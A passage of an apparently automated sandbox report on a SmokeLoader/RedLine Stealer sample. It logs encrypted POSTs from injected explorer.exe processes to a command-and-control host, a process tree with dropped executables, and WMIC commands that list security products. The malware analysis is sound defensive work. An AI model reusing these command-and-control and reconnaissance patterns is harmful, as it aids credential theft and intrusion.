                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 238
                                                                                          Host: calvinandhalls.com
                                                                                          2024-10-03 21:28:43 UTC238OUTData Raw: 72 19 89 cb f7 79 67 fe 61 8b 9d 1c 38 85 61 2d de 87 b3 db 62 0f 44 f7 02 06 b1 9b ed a7 44 ea 0b 99 b9 f7 75 f9 df 84 f3 79 d0 c4 ea 28 23 bc bb bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 64 34 01 83 b7 25 93 3c 71 f1 0e b2 80 c5 3d 46 f2 19 05 ef 2a 9f f9 32 73 eb 74 35 29 81 be 82 27 fc cf 08 5e 9d 86 76 b0 74 5e f9 d2 7f 34 21 01 0d 18 ed 03 98 f6 94 55 ee 95 61 07 4b fb 7e 50 b5 70 0f dd 82 bd b8 3c 66 84 67 b2 7b 83 7f 77 c2 07 b0 50 6c 6e 33 65 c7 aa 1e b1 90 06 ed 09 02 ee cf af 1a cc ac 1d 8f c0 f7 ce 2d 4e d0 ca d6 08 4a a2 42 0a 93 67 69 35 fc 5b 71 52 c5 2d 00 5b f5 8a 8d 14 31 ab b1 68 91 32 e9 b2 c5 09 29 14 44 d6 57 17 62 1b 2a e2 58 eb 83 6d 55 6f 3a 1f f5 97 2c 58 65
                                                                                          Data Ascii: ryga8a-bDDuy(#%P g3iqH[@Ld4%<q=F*2st5)'^vt^4!UaK~Pp<fg{wPln3e-NJBgi5[qR-[1h2)DWb*XmUo:,Xe
                                                                                          2024-10-03 21:28:43 UTC278INHTTP/1.1 200 OK
                                                                                          Date: Thu, 03 Oct 2024 21:28:43 GMT
                                                                                          Server: Apache/2.4.52 (Ubuntu)
                                                                                          X-Frame-Options: DENY
                                                                                          X-Content-Type-Options: nosniff
                                                                                          X-Frame-Options: DENY
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Content-Length: 0
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Connection: close


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          18192.168.2.55002123.145.40.1624436580C:\Windows\SysWOW64\explorer.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-10-03 21:28:49 UTC288OUTPOST /search.php HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: https://calvinandhalls.com/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 501
                                                                                          Host: calvinandhalls.com
                                                                                          2024-10-03 21:28:49 UTC501OUTData Raw: 72 19 89 cb f7 79 67 fe 61 8b 9d 1c 38 85 61 2d de 87 b3 db 62 0f 44 f7 02 06 b1 9b ed a7 44 ea 0b 99 b9 f7 75 f9 df 84 f3 79 d0 85 a6 6e 6c f2 e8 91 75 49 50 20 67 33 fa a7 84 c7 89 05 40 0c 18 e8 5a dd 46 4c 6a 34 01 83 b7 25 93 3c 48 cf 15 91 a3 dd 2a 25 c6 00 16 9c 51 e5 e3 1b 09 bf 67 33 46 c9 e0 f3 49 fe fe 76 77 f7 96 5d 8f 33 2d 87 e5 6a 0e 47 6b 11 28 eb 19 bb 96 8a 06 8b e6 69 22 2e 90 41 39 b6 26 46 ed f7 99 a5 69 56 b5 62 da 54 94 20 7f ae 3f 85 54 4b 4c 0b 75 ad cd 7c ad ce 1e f6 1b 7f ec df a1 3a c4 82 74 bf a9 ae b0 3c 40 b1 a9 83 68 08 b6 4f 33 ef 1c 56 37 92 48 30 54 cb 3a 16 27 d8 9a c1 22 28 9e f1 4d c6 4d f9 a5 fd 3d 62 78 55 c1 69 0d 6d 2e 12 ea 19 9d a6 13 37 17 43 39 f8 98 43 6d 54 28 ab f2 9b 3a c7 ff 68 fb 45 8a 9d d5 a4 7a b5 55
                                                                                          Data Ascii: ryga8a-bDDuynluIP g3@ZFLj4%<H*%Qg3FIvw]3-jGk(i".A9&FiVbT ?TKLu|:t<@hO3V7H0T:'"(MM=bxUim.7C9CmT(:hEzU
                                                                                          2024-10-03 21:28:50 UTC287INHTTP/1.1 404 Not Found
                                                                                          Date: Thu, 03 Oct 2024 21:28:50 GMT
                                                                                          Server: Apache/2.4.52 (Ubuntu)
                                                                                          X-Frame-Options: DENY
                                                                                          X-Content-Type-Options: nosniff
                                                                                          X-Frame-Options: DENY
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Content-Length: 409
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Connection: close
                                                                                          2024-10-03 21:28:50 UTC409INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68
                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered wh


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          19192.168.2.55002723.145.40.1624431028C:\Windows\explorer.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-10-03 21:30:05 UTC290OUTPOST /search.php HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: https://cmiubtivnasjoudw.org/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 109
                                                                                          Host: calvinandhalls.com
                                                                                          2024-10-03 21:30:05 UTC109OUTData Raw: 72 19 89 cb f7 79 67 fe 61 8b 9d 1c 38 85 61 2d de 87 b3 db 62 0f 44 f7 02 06 b1 9b ed a7 44 ea 0b 99 b9 f7 75 f9 df 84 f3 79 d0 c4 ea 28 23 bc bb bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 43 4c 6b 34 01 83 b6 25 93 3c 32 a9 65 e1 d2 fe 51 00 be 76 62 b5 25 c5 93 3b 3d b8 6a 01 20 c8 ea d4 2c be a9 07 02 86 d4
                                                                                          Data Ascii: ryga8a-bDDuy(#%P g3iqH[CLk4%<2eQvb%;=j ,
                                                                                          2024-10-03 21:30:05 UTC285INHTTP/1.1 404 Not Found
                                                                                          Date: Thu, 03 Oct 2024 21:30:05 GMT
                                                                                          Server: Apache/2.4.52 (Ubuntu)
                                                                                          X-Frame-Options: DENY
                                                                                          X-Content-Type-Options: nosniff
                                                                                          X-Frame-Options: DENY
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Content-Length: 7
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Connection: close
                                                                                          2024-10-03 21:30:05 UTC7INData Raw: 03 00 00 00 1e 0d af
                                                                                          Data Ascii:


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          20192.168.2.55002923.145.40.1624431028C:\Windows\explorer.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-10-03 21:30:24 UTC286OUTPOST /search.php HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: https://jiwfwlcanebf.net/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 109
                                                                                          Host: calvinandhalls.com
                                                                                          2024-10-03 21:30:24 UTC109OUTData Raw: 72 19 89 cb f7 79 67 fe 61 8b 9d 1c 38 85 61 2d de 87 b3 db 62 0f 44 f7 02 06 b1 9b ed a7 44 ea 0b 99 b9 f7 75 f9 df 84 f3 79 d0 c4 ea 28 23 bc bb bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 43 4c 6b 34 01 83 b6 25 93 3c 32 a9 65 e1 d2 fe 51 00 be 76 62 b5 25 c5 93 3b 3d b8 6a 01 20 c8 ea d4 2c be a9 07 02 86 d4
                                                                                          Data Ascii: ryga8a-bDDuy(#%P g3iqH[CLk4%<2eQvb%;=j ,
                                                                                          2024-10-03 21:30:25 UTC285INHTTP/1.1 404 Not Found
                                                                                          Date: Thu, 03 Oct 2024 21:30:25 GMT
                                                                                          Server: Apache/2.4.52 (Ubuntu)
                                                                                          X-Frame-Options: DENY
                                                                                          X-Content-Type-Options: nosniff
                                                                                          X-Frame-Options: DENY
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Content-Length: 7
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Connection: close
                                                                                          2024-10-03 21:30:25 UTC7INData Raw: 03 00 00 00 1e 0d af
                                                                                          Data Ascii:


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          21192.168.2.55003123.145.40.1624431028C:\Windows\explorer.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-10-03 21:30:36 UTC289OUTPOST /search.php HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: https://lymwoggejifjeow.com/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 109
                                                                                          Host: calvinandhalls.com
                                                                                          2024-10-03 21:30:36 UTC109OUTData Raw: 72 19 89 cb f7 79 67 fe 61 8b 9d 1c 38 85 61 2d de 87 b3 db 62 0f 44 f7 02 06 b1 9b ed a7 44 ea 0b 99 b9 f7 75 f9 df 84 f3 79 d0 c4 ea 28 23 bc bb bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 43 4c 6b 34 01 83 b6 25 93 3c 32 a9 65 e1 d2 fe 51 00 be 76 62 b5 25 c5 93 3b 3d b8 6a 01 20 c8 ea d4 2c be a9 07 02 86 d4
                                                                                          Data Ascii: ryga8a-bDDuy(#%P g3iqH[CLk4%<2eQvb%;=j ,
                                                                                          2024-10-03 21:30:37 UTC285INHTTP/1.1 404 Not Found
                                                                                          Date: Thu, 03 Oct 2024 21:30:36 GMT
                                                                                          Server: Apache/2.4.52 (Ubuntu)
                                                                                          X-Frame-Options: DENY
                                                                                          X-Content-Type-Options: nosniff
                                                                                          X-Frame-Options: DENY
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Content-Length: 7
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Connection: close
                                                                                          2024-10-03 21:30:37 UTC7INData Raw: 03 00 00 00 1e 0d af
                                                                                          Data Ascii:


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          22192.168.2.55003323.145.40.1624431028C:\Windows\explorer.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-10-03 21:30:55 UTC287OUTPOST /search.php HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: https://sobtugvkyrrny.net/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 109
                                                                                          Host: calvinandhalls.com
                                                                                          2024-10-03 21:30:55 UTC109OUTData Raw: 72 19 89 cb f7 79 67 fe 61 8b 9d 1c 38 85 61 2d de 87 b3 db 62 0f 44 f7 02 06 b1 9b ed a7 44 ea 0b 99 b9 f7 75 f9 df 84 f3 79 d0 c4 ea 28 23 bc bb bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 43 4c 6b 34 01 83 b6 25 93 3c 32 a9 65 e1 d2 fe 51 00 be 76 62 b5 25 c5 93 3b 3d b8 6a 01 20 c8 ea d4 2c be a9 07 02 86 d4
                                                                                          Data Ascii: ryga8a-bDDuy(#%P g3iqH[CLk4%<2eQvb%;=j ,
                                                                                          2024-10-03 21:30:56 UTC285INHTTP/1.1 404 Not Found
                                                                                          Date: Thu, 03 Oct 2024 21:30:56 GMT
                                                                                          Server: Apache/2.4.52 (Ubuntu)
                                                                                          X-Frame-Options: DENY
                                                                                          X-Content-Type-Options: nosniff
                                                                                          X-Frame-Options: DENY
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Content-Length: 7
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Connection: close
                                                                                          2024-10-03 21:30:56 UTC7INData Raw: 03 00 00 00 1e 0d af
                                                                                          Data Ascii:


                                                                                          Click to jump to process

                                                                                          Click to jump to process

                                                                                          Click to dive into process behavior distribution

                                                                                          Click to jump to process

                                                                                          Target ID:0
                                                                                          Start time:17:26:57
                                                                                          Start date:03/10/2024
                                                                                          Path:C:\Users\user\Desktop\9VgIkx4su0.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Users\user\Desktop\9VgIkx4su0.exe"
                                                                                          Imagebase:0x400000
                                                                                          File size:396'800 bytes
                                                                                          MD5 hash:5D99D66EF42EC43AF05B9304AEBEFDB6
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.2114850031.0000000002370000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.2114850031.0000000002370000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2114641854.000000000060F000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2114759693.0000000002090000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.2114892541.0000000002391000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.2114892541.0000000002391000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                          Reputation:low
                                                                                          Has exited:true

                                                                                          Target ID:2
                                                                                          Start time:17:27:03
                                                                                          Start date:03/10/2024
                                                                                          Path:C:\Windows\explorer.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\Explorer.EXE
                                                                                          Imagebase:0x7ff674740000
                                                                                          File size:5'141'208 bytes
                                                                                          MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:false

                                                                                          Target ID:4
                                                                                          Start time:17:27:22
                                                                                          Start date:03/10/2024
                                                                                          Path:C:\Users\user\AppData\Roaming\eihchav
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:C:\Users\user\AppData\Roaming\eihchav
                                                                                          Imagebase:0x400000
                                                                                          File size:396'800 bytes
                                                                                          MD5 hash:5D99D66EF42EC43AF05B9304AEBEFDB6
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000004.00000002.2340049741.0000000002090000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000004.00000002.2339931516.00000000005CD000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.2340094122.00000000020B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.2340094122.00000000020B0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.2340140325.00000000020D1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.2340140325.00000000020D1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                          Antivirus matches:
                                                                                          • Detection: 100%, Avira
                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                          • Detection: 34%, ReversingLabs
                                                                                          Reputation:low
                                                                                          Has exited:true

                                                                                          Target ID:6
                                                                                          Start time:17:28:02
                                                                                          Start date:03/10/2024
                                                                                          Path:C:\Users\user\AppData\Local\Temp\3E40.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:C:\Users\user\AppData\Local\Temp\3E40.exe
                                                                                          Imagebase:0x400000
                                                                                          File size:397'824 bytes
                                                                                          MD5 hash:119C907F0839351B214BD51034B6F124
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000003.2684210393.0000000000600000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.2735276469.0000000000600000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000006.00000002.2735276469.0000000000600000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000006.00000002.2735456331.00000000006AD000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000006.00000002.2735166251.0000000000560000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.2735334108.0000000000621000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000006.00000002.2735334108.0000000000621000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                          Antivirus matches:
                                                                                          • Detection: 100%, Avira
                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                          Reputation:low
                                                                                          Has exited:true

                                                                                          Target ID:7
                                                                                          Start time:17:28:25
                                                                                          Start date:03/10/2024
                                                                                          Path:C:\Users\user\AppData\Roaming\dghchav
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:C:\Users\user\AppData\Roaming\dghchav
                                                                                          Imagebase:0x400000
                                                                                          File size:397'824 bytes
                                                                                          MD5 hash:119C907F0839351B214BD51034B6F124
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000007.00000003.2931576265.00000000005F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000007.00000002.2982873164.00000000005F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000007.00000002.2982873164.00000000005F0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000007.00000002.2983352319.00000000020E1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000007.00000002.2983352319.00000000020E1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000007.00000002.2982835885.00000000005E0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000007.00000002.2983174460.000000000075D000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                          Antivirus matches:
                                                                                          • Detection: 100%, Avira
                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                          Reputation:low
                                                                                          Has exited:true

                                                                                          Target ID:8
                                                                                          Start time:17:28:39
                                                                                          Start date:03/10/2024
                                                                                          Path:C:\Users\user\AppData\Local\Temp\FDDB.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Users\user\AppData\Local\Temp\FDDB.exe
                                                                                          Imagebase:0x7ff6dfe20000
                                                                                          File size:78'336 bytes
                                                                                          MD5 hash:69C7186C5393D5E94294E39DA1D4D830
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Antivirus matches:
                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                          • Detection: 55%, ReversingLabs
                                                                                          Reputation:low
                                                                                          Has exited:false

                                                                                          Target ID:9
                                                                                          Start time:17:28:40
                                                                                          Start date:03/10/2024
                                                                                          Path:C:\Windows\System32\msiexec.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                          Imagebase:0x7ff768590000
                                                                                          File size:69'632 bytes
                                                                                          MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:false

                                                                                          Target ID:10
                                                                                          Start time:17:28:42
                                                                                          Start date:03/10/2024
                                                                                          Path:C:\Windows\SysWOW64\explorer.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                          Imagebase:0xa90000
                                                                                          File size:4'514'184 bytes
                                                                                          MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:moderate
                                                                                          Has exited:true

                                                                                          Target ID:11
                                                                                          Start time:17:28:43
                                                                                          Start date:03/10/2024
                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:cmd
                                                                                          Imagebase:0x7ff64c3b0000
                                                                                          File size:289'792 bytes
                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:false

                                                                                          Target ID:12
                                                                                          Start time:17:28:43
                                                                                          Start date:03/10/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff6d64d0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:false

                                                                                          Target ID:13
                                                                                          Start time:17:28:43
                                                                                          Start date:03/10/2024
                                                                                          Path:C:\Windows\explorer.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\explorer.exe
                                                                                          Imagebase:0x7ff674740000
                                                                                          File size:5'141'208 bytes
                                                                                          MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:14
                                                                                          Start time:17:28:44
                                                                                          Start date:03/10/2024
                                                                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csv
                                                                                          Imagebase:0x7ff72e630000
                                                                                          File size:576'000 bytes
                                                                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:moderate
                                                                                          Has exited:true

                                                                                          Target ID:15
                                                                                          Start time:17:28:45
                                                                                          Start date:03/10/2024
                                                                                          Path:C:\Windows\SysWOW64\explorer.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                          Imagebase:0xa90000
                                                                                          File size:4'514'184 bytes
                                                                                          MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 0000000F.00000002.4486975277.0000000000191000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                          Reputation:moderate
                                                                                          Has exited:false

                                                                                          Target ID:16
                                                                                          Start time:17:28:46
                                                                                          Start date:03/10/2024
                                                                                          Path:C:\Windows\explorer.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\explorer.exe
                                                                                          Imagebase:0x7ff674740000
                                                                                          File size:5'141'208 bytes
                                                                                          MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 00000010.00000002.4486772603.00000000008C1000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                          Reputation:high
                                                                                          Has exited:false

                                                                                          Target ID:17
                                                                                          Start time:17:28:46
                                                                                          Start date:03/10/2024
                                                                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csv
                                                                                          Imagebase:0x7ff72e630000
                                                                                          File size:576'000 bytes
                                                                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:18
                                                                                          Start time:17:28:47
                                                                                          Start date:03/10/2024
                                                                                          Path:C:\Windows\SysWOW64\explorer.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                          Imagebase:0xa90000
                                                                                          File size:4'514'184 bytes
                                                                                          MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:false

                                                                                          Target ID:19
                                                                                          Start time:17:28:48
                                                                                          Start date:03/10/2024
                                                                                          Path:C:\Windows\explorer.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\explorer.exe
                                                                                          Imagebase:0x7ff674740000
                                                                                          File size:5'141'208 bytes
                                                                                          MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:false

                                                                                          Target ID:20
                                                                                          Start time:17:28:48
                                                                                          Start date:03/10/2024
                                                                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:wmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csv
                                                                                          Imagebase:0x7ff72e630000
                                                                                          File size:576'000 bytes
                                                                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
